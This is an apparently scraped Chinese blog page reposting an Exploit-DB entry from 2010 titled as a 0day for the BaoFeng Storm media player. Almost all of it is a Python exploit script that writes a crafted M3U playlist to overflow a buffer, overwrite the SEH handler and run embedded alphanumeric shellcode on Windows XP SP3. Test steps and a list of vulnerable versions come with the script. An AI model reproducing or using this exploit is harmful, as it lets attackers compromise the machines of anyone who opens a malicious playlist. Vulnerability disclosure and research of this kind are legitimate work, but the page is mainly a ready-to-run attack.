Quantcast
Channel: 大西瓜的杂货铺 »暴风影音
Viewing all articles
Browse latest Browse all 3

暴风影音的最新0DAY_2010.05.06

$
0
0

From:digua

# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# EDB-ID: 12516
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Lufeng Li and Qingshan Li
# Published: 2010-05-06
# Verified: no
# Download Exploit Code
# Download N/A

view sourceprint?#!/usr/bin/env python

#################################################################

#

# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit

# CNVD-ID: CNVD-2010-00752

# Author: Lufeng Li and Qingshan Li of Neusoft Corporation

# Download: www.baofeng.com

# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file

# Platform: Windows XPSP3 Chinese Simplified

# Vulnerable: Storm2012 3.10.4.21

# Storm2012 3.10.4.16

# Storm2012 3.10.4.8

# Storm2012 3.10.3.17

# Storm2012 3.10.2.5

# Storm2012 3.10.1.12

#################################################################

# Code :

file= “baofeng.m3u”

junk =”\x41″*795

nseh=”\x61\xe8\xe1″

seh=”\xaa\xd7\x40″

jmp =”\x53\x53\x6d\x58\x6d\x05\x11\x22\x6d\x2d\x10\x22\x6d\xac\xe4″

nops =”\x42″ * 110

shellcode=(“PPYAIAIAIAIAQATAXAZAPA3QADAZA”

“BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA”

“58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB”

“AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K”

“22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL”

“MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55″

“Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V”

“NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB”

“R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT”

“NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU”

“89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM”

“KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC”

“QQ2LRCM0LJA”)

fobj=open(file,”w”)

payload=junk+nseh+seh+jmp+nops+shellcode

fobj.write(payload)

fobj.close()


Viewing all articles
Browse latest Browse all 3

Latest Images

Trending Articles



Latest Images